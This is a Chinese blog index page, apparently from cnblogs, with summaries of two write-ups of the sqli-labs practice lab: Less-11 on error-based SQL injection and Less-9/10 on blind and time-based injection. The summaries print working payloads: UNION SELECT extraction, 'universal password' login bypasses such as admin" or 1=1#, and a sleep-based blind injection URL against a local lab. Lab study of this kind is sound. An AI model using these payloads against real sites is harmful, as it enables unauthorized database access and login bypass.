2020年10月28日
Less-11【报错注入】
摘要: 测试单引号双引号 单引号报错,之后测试列数,测试结果2列 ' order by 3 # 进行脱库,后续不赘述 ' union select database(),null # 万能密码 admin")or 1=1# admin" or 1=1# admin ')or 1=1# 阅读全文
posted @ 2020-10-28 10:09 峰中追风 阅读(105) 评论(0) 推荐(0) 编辑
Less-9,10【盲注+时间注入】
摘要: Less 9 用单引、双引测试页面均无反应。先利用单引号闭合结合if sleep进行时间盲注 http://127.0.0.1/sqli-labs/Less-9/?id=1%27%20and%20if((substr(database(),1,1)=%27s%27),sleep(10),sleep( 阅读全文
posted @ 2020-10-28 10:02 峰中追风 阅读(100) 评论(0) 推荐(0) 编辑

___________________________________________________________________________________________没有白跑的路